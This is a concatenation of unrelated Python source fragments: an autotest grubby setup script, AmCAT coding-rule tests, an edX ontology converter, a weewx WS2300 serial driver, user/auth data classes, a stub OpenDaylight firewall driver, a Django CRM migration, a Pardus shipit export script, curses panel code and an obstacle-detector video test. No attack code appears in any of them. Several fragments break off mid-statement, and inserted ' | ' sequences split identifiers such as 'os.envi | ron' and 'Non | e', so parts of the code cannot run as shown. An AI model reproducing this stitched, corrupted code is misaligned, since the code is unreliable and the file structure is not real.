from autotest.client import utils
version = 1
def setup(tarball, topdir):
srcdir = os.path.join(topdir, 'src')
utils.extract_tarball_to_dir(tarball, srcdir)
os.chdir(srcdir)
utils.make()
os.envi | ron['MAKEOPTS'] = 'mandir=/usr/share/man'
utils.make('install')
os.chdir(t | opdir)
pwd = os.getcwd()
tarball = os.path.join(pwd, 'grubby-8.11-autotest.tar.bz2')
utils.update_version(os.path.join(pwd, 'src'),
False, version, setup, tarball, pwd)
|
###########################################################################
# (C) Vrije Universiteit, Amsterdam (the Netherlands) #
# #
# This file is part of AmCAT - The Amsterdam Content Analysis Toolkit #
# #
# AmCAT is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Affero General Public License as published by the #
# Free Software Foundation, either version 3 of the License, or (at your #
# option) any later version. #
# #
# AmCAT is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public #
# License for more details. #
# #
# You should have received a copy of the GNU Affero General Public #
# License along with AmCAT. If not, see <http://www.gnu.org/licenses/>. #
###########################################################################
import json
from amcat.models import CodingRule, CodingSchemaField, Code
from amcat.models.coding.codingruletoolkit import schemarules_valid, parse, to_json, EQUALS, \
clean_tree, NOT, OR
from amcat.models.coding.codingschema import ValidationError
from amcat.tools import amcattest
class TestCodingRuleToolkit(amcattest.AmCATTestCase):
def condition(self, s, c):
return CodingRule(codingschema=s, condition=c)
def test_schemafield_valid(self):
schema_with_fields = amcattest.create_test_schema_with_fields()
schema = schema_with_fields[0]
self.assertTrue(schemarules_valid(schema))
self.condition(schema, "()").save()
self.assertTrue(schemarules_valid(schema))
self.condition(schema, "(3==2)").save()
self.assertFalse(schemarules_valid(schema))
CodingRule.objects.all().delete()
# Test multiple (correct) rules
self.condition(schema, "()").save()
self.condition(schema, "()").save()
self.condition(schema, "()").save()
self.assertTrue(schemarules_valid(schema))
self.condition(schema, "(3==2)").save()
self.assertFalse(schemarules_valid(schema))
def test_to_json(self):
import functools
o1, o2 = amcattest.create_test_code(), amcattest.create_test_code()
schema_with_fields = amcattest.create_test_schema_with_fields()
code_field = schema_with_fields[4]
c = functools.partial(self.condition, schema_with_fields[0])
tree = to_json(parse(c("{}=={}".format(code_field.id, o1.id))))
self.assertEquals(json.loads(tree), {"type": EQUALS, "values": [
{"type": "codingschemafield", "id": code_field.id},
{"type": "code", "id": o1.id}
]})
tree = parse(c("{}=={}".format(code_field.id, o1.id)))
self.assertEquals(json.dumps(to_json(tree, serialise=False)), to_json(tree))
def test_clean_tree(self):
import functools
o1, o2 = amcattest.create_test_code(), amcattest.create_test_code()
codebook, codebook_codes = amcattest.create_test_codebook_with_codes()
schema_with_fields = amcattest.create_test_schema_with_fields(codebook=codebook)
schema = schema_with_fields[0]
code_field = schema_with_fields[4]
c = functools.partial(self.condition, schema)
tree = parse(c("{code_field.id}=={o1.id}".format(**locals())))
self.assertRaises(ValidationError, clean_tree, schema, tree)
| tree = parse(c("{code_field.id}=={code.id}".format(code_field=code_field, code=codebook.codes[0])))
self.assertEquals(clean_tree(schema, tree), Non | e)
self.assertRaises(ValidationError, clean_tree, amcattest.create_test_schema_with_fields()[0], tree)
def test_parse(self):
import functools
o1, o2 = amcattest.create_test_code(), amcattest.create_test_code()
schema_with_fields = amcattest.create_test_schema_with_fields()
schema = schema_with_fields[0]
codebook = schema_with_fields[1]
text_field = schema_with_fields[2]
number_field = schema_with_fields[3]
code_field = schema_with_fields[4]
c = functools.partial(self.condition, schema)
# Empty conditions should return None
self.assertEquals(parse(c("")), None)
self.assertEquals(parse(c("()")), None)
# Recursion should be checked for
cr = CodingRule.objects.create(codingschema=schema, label="foo", condition="()")
cr.condition = str(cr.id)
self.assertRaises(SyntaxError, parse, cr)
# Nonexisting fields should raise an error
cr.condition = "0==2"
self.assertRaises(CodingSchemaField.DoesNotExist, parse, cr)
cr.condition = "{}==0".format(code_field.id)
self.assertRaises(Code.DoesNotExist, parse, cr)
cr.condition = "0"
self.assertRaises(CodingRule.DoesNotExist, parse, cr)
cr.condition = "{}=={}".format(code_field.id, o1.id)
self.assertTrue(parse(cr) is not None)
# Wrong inputs for fields should raise an error
for inp in ("'a'", "0.2", "u'a'"):
cr.condition = "{}=={}".format(number_field.id, inp)
self.assertRaises(SyntaxError, parse, cr)
for inp in ("'a'", "0.2", "u'a'", repr(str(o1.id))):
cr.condition = "{}=={}".format(code_field.id, inp)
self.assertRaises(SyntaxError, parse, cr)
for inp in ("'a'", "0.2", "2"):
cr.condition = "{}=={}".format(text_field.id, inp)
self.assertRaises(SyntaxError, parse, cr)
# "Good" inputs shoudl not yield an error
for field, inp in ((number_field, 1), (text_field, "u'a'"), (code_field, o1.id)):
cr.condition = "{}=={}".format(field.id, inp)
self.assertTrue(parse(cr) is not None)
# Should accept Python-syntax (comments, etc)
cr.condition = """{}==(
# This should be a comment)
{})""".format(text_field.id, "u'a'")
self.assertTrue(parse(cr) is not None)
## Testing output
tree = parse(c("not {}".format(cr.id)))
self.assertEquals(tree["type"], NOT)
self.assertTrue(not isinstance(tree["value"], CodingRule))
tree = parse(c("{}=={}".format(text_field.id, "u'a'")))
self.assertEquals(tree, {"type": EQUALS, "values": (text_field, u'a')})
cr.save()
tree = parse(c("{cr.id} or {cr.id}".format(cr=cr)))
self.assertEquals(tree, {"type": OR, "values": (parse(cr), parse(cr))})
# Should accept greater than / greater or equal to / ...
parse(c("{number_field.id} > 5".format(**locals())))
parse(c("{number_field.id} < 5".format(**locals())))
parse(c("{number_field.id} >= 5".format(**locals())))
parse(c("{number_field.id} <= 5".format(**locals())))
# ..but not if schemafieldtype is text or code
self.assertRaises(SyntaxError, parse, c("{text_field.id} > 5".format(**locals())))
self.assertRaises(SyntaxError, parse, c("{code_field.id} > 5".format(**locals())))
|
import json
from owlready import *
# input parameters
file_path = sys.argv[1]
onto_path = sys.argv[2]
# load ontology
onto = get_ontology(onto_path).load()
# course found list
course_ids = []
# for each course, find the active version (avoid multi instances of one course)
with open(file_path + '/modulestore.active_versions.json','r') as f:
for line in f:
course = json.loads(line)
# for one course, only use its published version
course_id = course['versions']['published-branch']['$oid']
course_ids.append([course_id,'-v'+str(course['schema_version'])+':'+course['org']+'+'+course['course']+'+'+course['run']])
f.closed
for one_course in course_ids:
course_id = one_course[0]
# for each publish version we found, search for its structure data in json file
with open(file_path + '/modulestore.structures.json', 'r') as f:
for line in f:
obj = json.loads(line)
if obj['_id']['$oid'] == course_id:
# temp save this data to a json file
print('=======Find one=======')
print(course_id)
with open(file_path + '/' + course_id + '.json', 'w+') as fout:
json.dump(obj,fout)
fout.closed
break
f.closed
# function to find a instance by its id
def find_obj_by_oid(obj_list, obj_oid):
for one_obj in obj_list:
if one_obj.name == obj_oid:
return one_obj
return None
# function to find a instance by its xml name
def find_obj_by_xml_id(obj_list, obj_xml_id, obj_name):
for one_obj in obj_list:
if hasattr(one_obj, obj_name + '_xml_id') and getattr(one_obj, obj_name + '_xml_id')[0] == obj_xml_id:
return one_obj
return None
# for each course we found
for one_course in course_ids:
course_id = one_course[0]
# open its structure json file
print('===========deal with course : ' + course_id + '===========')
with open(file_path + '/' + course_id + '.json','r') as f:
for line in f:
obj = json.loads(line)
# find all its blocks
blocks = obj['blocks']
for block in blocks:
# for each block, if its type defined in ontology
obj_name = block['block_type']
if ('course_model.' + obj_name) in str(onto.classes):
obj_oid = block['definition']['$oid']
obj_xml_id = block['block_id']
# create an ontology individual for this block
temp_obj = getattr(onto, obj_name)(obj_oid)
# set xml id data property
getattr(temp_obj, | obj_name | +'_xml_id').append(obj_xml_id)
# set display name property
if 'display_name' in block['fields'].keys():
obj_display_name = block['fields']['display_name']
getattr(temp_obj,obj_name+'_display_name').append(obj_display_name)
# if this instance is a course
if obj_name == 'course':
temp_id = obj_xml_id + str(one_course[1])
course_org = temp_id.split(':')[-1].split('+')[0]
course_tag = temp_id.split(':')[-1].split('+')[1]
# set course id, course org and course tag
getattr(temp_obj,obj_name+'_id').append(temp_id)
getattr(temp_obj,obj_name+'_org').append(course_org)
getattr(temp_obj,obj_name+'_tag').append(course_tag)
# create object property
for block in blocks:
obj_name = block['block_type']
if ('course_model.' + obj_name) in str(onto.classes):
obj_oid = block['definition']['$oid']
obj_list = onto.instances
temp_obj = find_obj_by_oid(obj_list, obj_oid)
# find sub-level instance of this block
temp_sub_obj_list = block['fields']['children']
for sub_obj in block['fields']['children']:
sub_obj_name = sub_obj[0]
sub_obj_xml_id = sub_obj[1]
sub_obj_list = onto.instances
temp_sub_obj = find_obj_by_xml_id(sub_obj_list, sub_obj_xml_id, sub_obj_name)
if obj_name == 'vertical':
temp_sub_obj_name = 'xblock'
else:
temp_sub_obj_name = sub_obj_name
if temp_sub_obj is not None:
# create object property
getattr(temp_obj,'has_' + temp_sub_obj_name).append(temp_sub_obj)
f.closed
onto.save()
|
for all characters to be sent.
#
def flush(self): raise NotImplementedError()
#
# Read a character, waiting for a most timeout seconds. Return the
# character read, or None if the timeout occurred.
#
def read_byte(self, timeout): raise NotImplementedError()
#
# Release the serial port. Closes it until it is used again, when
# it is automatically re-opened. It need not be implemented.
#
def release(self): pass
#
# Write characters to the serial port.
#
def write(self, data): raise NotImplementedError()
#
# A Linux Serial port. Implements the Serial interface on Linux.
#
class LinuxSerialPort(SerialPort):
SERIAL_CSIZE = {
"7": tty.CS7,
"8": tty.CS8, }
SERIAL_PARITIES= {
"e": tty.PARENB,
"n": 0,
"o": tty.PARENB|tty.PARODD, }
SERIAL_SPEEDS = {
"300": tty.B300,
"600": tty.B600,
"1200": tty.B1200,
"2400": tty.B2400,
"4800": tty.B4800,
"9600": tty.B9600,
"19200": tty.B19200,
"38400": tty.B38400,
"57600": tty.B57600,
"115200": tty.B115200, }
SERIAL_SETTINGS = "2400,n,8,1"
device = None # string, the device name.
orig_settings = None # class, the original ports settings.
select_list = None # list, The serial ports
serial_port = None # int, OS handle to device.
settings = None # string, the settings on the command line.
#
# Initialise ourselves.
#
def __init__(self,device,settings=SERIAL_SETTINGS):
self.device = device
self.settings = settings.split(",")
self.settings.extend([None,None,None])
self.settings[0] = self.__class__.SERIAL_SPEEDS.get(self.settings[0], None)
self.settings[1] = self.__class__.SERIAL_PARITIES.get(self.settings[1].lower(), None)
self.settings[2] = self.__class__.SERIAL_CSIZE.get(self.settings[2], None)
if len(self.settings) != 7 or None in self.settings[:3]:
raise FatalError(self.device, 'Bad serial settings "%s".' % settings)
self.settings = self.settings[:4]
#
# Open the port.
#
try:
self.serial_port = os.open(self.device, os.O_RDWR)
except EnvironmentError, e:
raise FatalError(self.device, "can't open tty device - %s." % str(e))
try:
fcntl.flock(self.serial_port, fcntl.LOCK_EX)
self.orig_settings = tty.tcgetattr(self.serial_port)
setup = self.orig_settings[:]
setup[0] = tty.INPCK
setup[1] = 0
setup[2] = tty.CREAD|tty.HUPCL|tty.CLOCAL|reduce(lambda x,y: x|y, self.settings[:3])
setup[3] = 0 # tty.ICANON
setup[4] = self.settings[0]
setup[5] = self.settings[0]
setup[6] = ['\000']*len(setup[6])
setup[6][tty.VMIN] = 1
setup[6][tty.VTIME] = 0
tty.tcflush(self.serial_port, tty.TCIOFLUSH)
#
# Restart IO if stopped using software flow control (^S/^Q). This
# doesn't work on FreeBSD.
#
try:
tty.tcflow(self.serial_port, tty.TCOON|tty.TCION)
except termios.error:
pass
tty.tcsetattr(self.serial_port, tty.TCSAFLUSH, setup)
#
# Set DTR low and RTS high and leave other control lines untouched.
#
arg = struct.pack('I', 0)
arg = fcntl.ioctl(self.serial_port, tty.TIOCMGET, arg)
portstatus = struct.unpack('I', arg)[0]
portstatus = portstatus & ~tty.TIOCM_DTR | tty.TIOCM_RTS
arg = struct.pack('I', portstatus)
fcntl.ioctl(self.serial_port, tty.TIOCMSET, arg)
self.select_list = [self.serial_port]
except Exception:
os.close(self.serial_port)
raise
def close(self):
if self.orig_settings:
tty.tcsetattr(self.serial_port, tty.TCSANOW, self.orig_settings)
os.close(self.serial_port)
def read_byte(self, timeout):
ready = select.select(self.select_list, [], [], timeout)
if not ready[0]:
return None
return os.read(self.serial_port, 1)
#
# Write a string to the port.
#
def write(self, data):
os.write(self.serial_port, data)
#
# Flush the input buffer.
#
def clear(self):
tty.tcflush(self.serial_port, tty.TCIFLUSH)
#
# Flush the output buffer.
#
def flush(self):
tty.tcdrain(self.serial_port)
#
# This class reads and writes bytes to a Ws2300. It is passed something
# that implements the Serial interface. The major routines are:
#
# Ws2300() - Create one of these objects that talks over the serial port.
# read_batch() - Reads data from the device using an scatter/gather interface.
# write_safe() - Writes data to the device.
#
class Ws2300(object):
#
# An exception for us.
#
class Ws2300Exception(WeeWxIOError):
def __init__(self, *args):
WeeWxIOError.__init__(self, *args)
#
# Constants we use.
#
MAXBLOCK = 30
MAXRETRIES = 50
MAXWINDRETRIES= 20
WRITENIB = 0x42
SETBIT = 0x12
UNSETBIT = 0x32
WRITEACK = 0x10
SETACK = 0x04
UNSETACK = 0x0C
RESET_MIN = 0x01
RESET_MAX = 0x02
MAX_RESETS = 100
#
# Instance data.
#
log_buffer = None # list, action log
log_mode = None # string, Log mode
long_nest = None # int, Nesting of log actions
serial_port = None # string, SerialPort port to use
#
# Initialise ourselves.
#
def __init__(self,serial_port):
self.log_buffer = []
self.log_nest = 0
self.serial_port = serial_port
#
# Write data to the device.
#
def write_byte(self,data):
if self.log_mode != 'w':
if self.log_mode != 'e':
self.log(' ')
self.log_mode = 'w'
self.log("%02x" % ord(data))
self.serial_port.write(data)
#
# Read a byte from the device.
#
def read_byte(self, timeout=1.0):
if self.log_mode != 'r':
self.log_mode = 'r'
self.log(':')
result = self.serial_port.read_byte(timeout)
if result == None:
self.log("--")
else:
self.log("%02x" % ord(result))
return result
#
# Remove all pending incoming characters.
#
def clear_device(self):
if self.log_mode != 'e':
self.log(' ')
self.log_mode = 'c'
self.log("C")
self.serial_port.clear()
#
# Write a reset string and wait for a reply.
#
def reset_06(self):
self.log_enter("re")
try:
for _ in range(self.__class__.MAX_RESETS):
self.clear_device()
self.write_byte('\x06' | )
#
# Occasionally 0, then 2 is returned. If 0 comes back,
# continue reading as this i | s more efficient than sending
# an out-of sync reset and letting the data reads restore
# synchronization. Occasionally, multiple 2's are returned.
# Read with a fast timeout until all data is exhausted, if
# we got a 2 back at all, we consider it a success.
#
success = False
answer = self.read_byte()
while answer != None:
if answer == '\x02':
success = True
answer = self.read_byte(0.05)
if success:
return
msg = "Reset failed, %d retries, no response" % self.__class__.MAX_RESETS
raise self.Ws2300Exception(msg)
finally:
self.log_exit()
#
# Encode the address.
#
def write_address(self,address):
for digit in range(4):
byte = chr((address >> (4 * (3-digit)) & 0x |
import datetime
class AuthenticationInfo:
def __init__(self, password, email):
self.Password = password
self.Email = email
class ProfileInfo:
def __init__(self, display_name):
self.DisplayName = display_name
class Token:
def __init__(self, id_token, valid_until):
self.Id = id_token
self.ValidUntil = valid_until
class User:
def __init__(self, id_user, username, display_name, groups):
self.IdUser = id_user
self.Username = username
self.DisplayName = display_name
self.Groups = groups
class Group:
def __init__(self, id_group, name):
self.Id = id_group
self.Name = name
class CreateUserRequest:
def __init__(self, username, authentication, profile):
self.Username = username
self.Authentication = authentication
self.Profile = profile
class ModifyCredentialsRequest:
def __init__(self, username, token, authentication):
self.Username = username
self.Token = token
self.Authentication = authenticat | ion
class ModifyProfileRequest:
def __init__(self, username, token, profile):
self.Username = username
self.Token = token
self.Profile = profile
class AddUserToGroupRequest:
def __init__(self, username, token, user_to_add, id_group):
self.Username = username
self.Token = token
self.UserToAdd = us | er_to_add
self.IdGroup = id_group
class TokenSuccessResponse:
def __init__(self, success, token):
self.Success = success
self.Token = token
@staticmethod
def invalid():
return TokenSuccessResponse(
False,
Token("", datetime.datetime.now()))
class ConnectUserResponse:
def __init__(self, success, token, id_user):
self.Success = success
self.Token = token
self.IdUser = id_user
@staticmethod
def invalid():
return ConnectUserResponse(
False,
Token("", datetime.datetime.now()),
0)
class UserSummaryResponse:
def __init__(self, success, token, display_name, groups):
self.Success = success
self.Token = token
self.DisplayName = display_name
self.Groups = groups
@staticmethod
def invalid():
return UserSummaryResponse(
False,
Token("", datetime.datetime.now()),
"", [])
class UserListResponse:
def __init__(self, success, token, users):
self.Success = success
self.Token = token
self.Users = users
@staticmethod
def invalid():
return UserListResponse(
False,
Token("", datetime.datetime.now()),
[])
|
#
# Copyright (C) 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from oslo_log import log as logging
from neutron_fwaas.services.firewall.drivers import fwaas_base
from networking_odl.common import client as odl_client
from networking_odl.common import config # noqa
LOG = logging.getLogger(__name__)
class OpenDaylightFwaasDriver(fwaas_base.FwaasDriverBase):
"""OpenDaylight FWaaS Driver
This code is the backend implementation for the OpenDaylight FWaaS
driver for Openstack Neutron.
"""
def __init__(self):
LOG.debug("Initializing OpenDaylight FWaaS driver")
self.client = odl_client.OpenDaylightRes | tClient.create_client()
def create_firewall(self, apply_list, firewall):
"""Create the Firewall with default (drop all) policy.
The default policy will be applied on all the interfaces of
| trusted zone.
"""
pass
def delete_firewall(self, apply_list, firewall):
"""Delete firewall.
Removes all policies created by this instance and frees up
all the resources.
"""
pass
def update_firewall(self, apply_list, firewall):
"""Apply the policy on all trusted interfaces.
Remove previous policy and apply the new policy on all trusted
interfaces.
"""
pass
def apply_default_policy(self, apply_list, firewall):
"""Apply the default policy on all trusted interfaces.
Remove current policy and apply the default policy on all trusted
interfaces.
"""
pass
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='CallLog',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date', models.DateTimeField(auto_now_add=True)),
('note', models.TextField()),
],
),
migrations.CreateModel(
name='Campaign',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=200)),
('description', models.TextField(null=True, blank=True)),
],
),
migrations.CreateModel(
name='Company',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=200)),
('website', models.URLField(null=True, blank=True)),
('address1', models.CharField(max_length=200, null=True, blank=True)),
('address2', models.CharField(max_length=200, null=True, blank=True)),
('city', models.CharField(max_length=200, null=True, blank=True)),
('state', models.CharField(max_length=200, null=True, blank=True)),
('zipcode', models.CharField(max_length=200, null=True, blank=True)),
('country', models.CharField(max_length=200, null=True, blank=True)),
('phone', models.CharField(max_length=200, null=True, blank=True)),
],
options={
'verbose_name_plural': 'companies',
},
),
migrations.CreateMode | l(
name='Contact',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('first_name', models.CharField(max_length=200)),
('last_name', models.CharField(max_length=200)),
('address1', models.CharField(max_length=200, null=True, blank=True)),
('address2', models.CharField(max_ | length=200, null=True, blank=True)),
('city', models.CharField(max_length=200, null=True, blank=True)),
('state', models.CharField(max_length=200, null=True, blank=True)),
('zipcode', models.CharField(max_length=200, null=True, blank=True)),
('country', models.CharField(max_length=200, null=True, blank=True)),
('phone', models.CharField(max_length=200, null=True, blank=True)),
('email', models.EmailField(max_length=200, null=True, blank=True)),
('company', models.ForeignKey(blank=True, to='crm.Company', null=True)),
],
),
migrations.CreateModel(
name='Opportunity',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('value', models.FloatField(help_text=b'How much this opportunity is worth to the organization')),
('create_date', models.DateTimeField(auto_now_add=True)),
('company', models.ForeignKey(blank=True, to='crm.Company', null=True)),
('contact', models.ForeignKey(to='crm.Contact')),
('source', models.ForeignKey(help_text=b'How did this contact find out about us?', to='crm.Campaign')),
],
options={
'verbose_name_plural': 'opportunities',
},
),
migrations.CreateModel(
name='OpportunityStage',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('opportunity', models.ForeignKey(to='crm.Opportunity')),
],
),
migrations.CreateModel(
name='Reminder',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date', models.DateField()),
('note', models.CharField(max_length=200)),
('completed', models.BooleanField(default=False)),
('opportunity', models.ForeignKey(to='crm.Opportunity')),
],
),
migrations.CreateModel(
name='Report',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=200)),
('link', models.URLField()),
],
),
migrations.CreateModel(
name='Stage',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=200)),
('order', models.IntegerField(help_text=b'The order this is displayed on the screen')),
('description', models.TextField(null=True, blank=True)),
('value', models.IntegerField(help_text=b'On a scale of 0 to 100 of the stage of the pipeline')),
],
),
migrations.AddField(
model_name='opportunitystage',
name='stage',
field=models.ForeignKey(to='crm.Stage'),
),
migrations.AddField(
model_name='opportunitystage',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='opportunity',
name='stage',
field=models.ForeignKey(to='crm.Stage'),
),
migrations.AddField(
model_name='opportunity',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='calllog',
name='opportunity',
field=models.ForeignKey(to='crm.Opportunity'),
),
migrations.AddField(
model_name='calllog',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import locale
import os
import sys
from datetime import date
from kargoxml import add_column
script_dir = os.path.split(os.path.abspath(os.path.dirname(__file__ | )))[0]
project_dir = os.path.split(script_dir)[0]
sys.path.append(project_dir)
sys.path.append(os.path.split(project_dir)[0])
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from oi.shipit.models import CdClient
from oi.shipit.models import PardusVersion
from django.template | .defaultfilters import slugify
if __name__ == '__main__':
args = sys.argv
pardus_versions = PardusVersion.objects.all()
if len(args) != 2:
print("Usage: python %s [limit]") % __file__
sys.exit()
try:
limit = int(args[-1])
except ValueError:
print("Invalid limit: %s") % args[-1]
sys.exit()
#locale.setlocale(locale.LC_ALL, "tr_TR.UTF-8")
for version in pardus_versions:
cdclient = CdClient.objects.filter(confirmed=1,
sent=0, taken=0, version=version).order_by('date')[:limit]
add_column(cdclient, date.today().isoformat(), slugify(version))
|
nt
"""
if self.top != top:
self.top = top
self.win = None
def getLeft(self):
"""
Provides the left position where this subwindow is placed within its
parent.
"""
return self.left
def setLeft(self, left):
"""
Changes the left position where this subwindow is placed within its parent.
Arguments:
left - positioning of top within parent
"""
if self.left != left:
self.left = left
self.win = None
def getHeight(self):
"""
Provides the height used for subwindows (-1 if it isn't limited).
"""
return self.height
def setHeight(self, height):
"""
Changes the height used for subwindows. This uses all available space if -1.
Arguments:
height - maximum height of panel (uses all available space if -1)
"""
if self.height != height:
self.height = height
self.win = None
def getWidth(self):
"""
Provides the width used for subwindows (-1 if it isn't limited).
"""
return self.width
def setWidth(self, width):
"""
Changes the width used for subwindows. This uses all available space if -1.
Arguments:
width - maximum width of panel (uses all available space if -1)
"""
if self.width != width:
self.width = width
self.win = None
def getPreferredSize(self):
"""
Provides the dimensions the subwindow would use when next redrawn, given
that none of the properties of the panel or parent change before then. This
returns a tuple of (height, width).
"""
newHeight, newWidth = self.parent.getmaxyx()
setHeight, setWidth = self.getHeight(), self.getWidth()
newHeight = max(0, newHeight - self.top)
newWidth = max(0, newWidth - self.left)
if setHeight != -1: newHeight = min(newHeight, setHeight)
if setWidth != -1: newWidth = min(newWidth, setWidth)
return (newHeight, newWidth)
def handleKey(self, key):
"""
Handler for user input. This returns true if the key press was consumed,
false otherwise.
Arguments:
key - keycode for the key pressed
"""
return False
def getHelp(self):
"""
Provides help information for the controls this page provides. This is a
list of tuples of the form...
(control, description, status)
"""
return []
def draw(self, width, height):
"""
Draws display's content. This is meant to be overwritten by
implementations and not called directly (use redraw() instead). The
dimensions provided are the drawable dimensions, which in terms of width is
a column less than the actual space.
Arguments:
width - horizontal space available for content
height - vertical space available for content
"""
pass
def redraw(self, forceRedraw=False, block=False):
"""
Clears display and redraws its content. This can skip redrawing content if
able (ie, the subwindow's unchanged), instead just refreshing the display.
Arguments:
forceRedraw - forces the content to be cleared and redrawn if true
block - if drawing concurrently with other panels this determines
if the request is willing to wait its turn or should be
abandoned
"""
# skipped if not currently visible or activity has been halted
if not self.isVisible() or HALT_ACTIVITY: return
# if the panel's completely outside its parent then this is a no-op
newHeight, newWidth = self.getPreferredSize()
if newHeight == 0 or newWidth == 0:
self.win = None
return
# recreates the subwindow if necessary
isNewWindow = self._resetSubwindow()
# The reset argument is disregarded in a couple of situations:
# - The subwindow's been recreated (obviously it then doesn't have the old
# content to refresh).
# - The subwindow's dimensions have changed since last drawn (this will
# likely change the content's layout)
subwinMaxY, subwinMaxX = self.win.getmaxyx()
if isNewWindow or subwinMaxY != self.maxY or subwinMaxX != self.maxX:
forceRedraw = True
self.maxY, self.maxX = subwinMaxY, subwinMaxX
if not CURSES_LOCK.acquire(block): return
try:
if forceRedraw:
self.win.erase() # clears any old contents
self.draw(self.maxX, self.maxY)
self.win.refresh()
finally:
CURSES_LOCK.release()
def hline(self, y, x, length, attr=curses.A_NORMAL):
"""
Draws a horizontal line. This should only be called from the context of a
panel's draw method.
Arguments:
y - vertical location
x - horizontal location
length - length the line spans
attr - text attributes
"""
if self.win and self.maxX > x and self.maxY > y:
try:
drawLength = min(length, self.maxX - x)
self.win.hline(y, x, curses.ACS_HLINE | attr, drawLength)
except:
# in edge cases drawing could cause a _curses.error
pass
def vline(self, y, x, length, attr=curses.A_NORMAL):
"""
Draws a vertical line. This should only be called from the context o | f a
panel's draw method.
Arguments:
y - vertical location
x - horizontal location
length - length the line spans
attr - text attributes
"""
if self.win and self.maxX > x and self.maxY > y:
try:
drawLength = min(length, self.maxY - y)
| self.win.vline(y, x, curses.ACS_VLINE | attr, drawLength)
except:
# in edge cases drawing could cause a _curses.error
pass
def addch(self, y, x, char, attr=curses.A_NORMAL):
"""
Draws a single character. This should only be called from the context of a
panel's draw method.
Arguments:
y - vertical location
x - horizontal location
char - character to be drawn
attr - text attributes
"""
if self.win and self.maxX > x and self.maxY > y:
try:
self.win.addch(y, x, char, attr)
except:
# in edge cases drawing could cause a _curses.error
pass
def addstr(self, y, x, msg, attr=curses.A_NORMAL):
"""
Writes string to subwindow if able. This takes into account screen bounds
to avoid making curses upset. This should only be called from the context
of a panel's draw method.
Arguments:
y - vertical location
x - horizontal location
msg - text to be added
attr - text attributes
"""
# subwindows need a single character buffer (either in the x or y
# direction) from actual content to prevent crash when shrank
if self.win and self.maxX > x and self.maxY > y:
try:
self.win.addstr(y, x, msg[:self.maxX - x], attr)
except:
# this might produce a _curses.error during edge cases, for instance
# when resizing with visible popups
pass
def addfstr(self, y, x, msg):
"""
Writes string to subwindow. The message can contain xhtml-style tags for
formatting, including:
<b>text</b> bold
<u>text</u> underline
<h>text</h> highlight
<[color]>text</[color]> use color (see getColor() for constants)
Tag nesting is supported and tag closing is str |
#!/usr/bin/python3
import numpy as np
import cv2
from collections import deque
from obstacle_detector.distance_calculator import spline_dist
from obst | acle_detector.perspective import inv_persp_new
from obstacle_detector.perspective import regress_perspecive
from obstacle_detector.depth_mapper import calculate_depth_map
from obstacle_detector.tm.image_shift_calculator import find_shift_value
def video_test(input_video_path=None, output_video_path=None):
cx = 595
cy = 303
roi_width = 25
roi_length = 90
cap = cv2.VideoCapture(
input_video_path \
if input_video_path is not N | one \
else input('enter video path: '))
old_images = deque()
original_frames = deque()
ret, frame = cap.read()
for i in range(15):
original_frames.append(frame)
img, pts1 = inv_persp_new(
frame, (cx, cy), (roi_width, roi_length), spline_dist, 200)
old_images.append(img)
ret, frame = cap.read()
height, width, _ = frame.shape
out_height, out_width, _ = img.shape
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(
output_video_path \
if output_video_path is not None \
else 'output.avi',
fourcc, 15.0, (out_width * 4, out_height))
left = cv2.imread('aloeL.jpg')
right = cv2.imread('aloeR.jpg')
while(ret):
original_frames.popleft()
ret, frame = cap.read()
original_frames.append(frame)
img, pts1 = inv_persp_new(
frame, (cx, cy), (roi_width, roi_length), spline_dist, 200)
old_images.popleft()
old_images.append(img)
left = original_frames[-5][:, width // 2:]
right = original_frames[-1][:, width // 2:]
left = cv2.pyrDown(left)
left = cv2.blur(left, (3, 3))
right = cv2.pyrDown(right)
right = cv2.blur(right, (3, 3))
depth = calculate_depth_map(left, right)
cv2.imshow('left', left)
cv2.imshow('right', right)
cv2.imshow('depth', depth)
depth = cv2.cvtColor(depth, cv2.COLOR_GRAY2BGR)
res = cv2.addWeighted(left, 0.5, depth, 0.5, 0)
cv2.imshow('res', res)
# left = old_images[-1][300:,:]
# right = old_images[-9][300:,:]
#
# shift_value = find_shift_value(left, right, (30, 100, 60, 300))
# right = np.roll(right, shift_value[1], axis=0)#shift_value[0])
# right = np.roll(right, shift_value[0], axis=1)#shift_value[0])
# left = left[100:-100,:]
# right = right[100:-100,:]
#
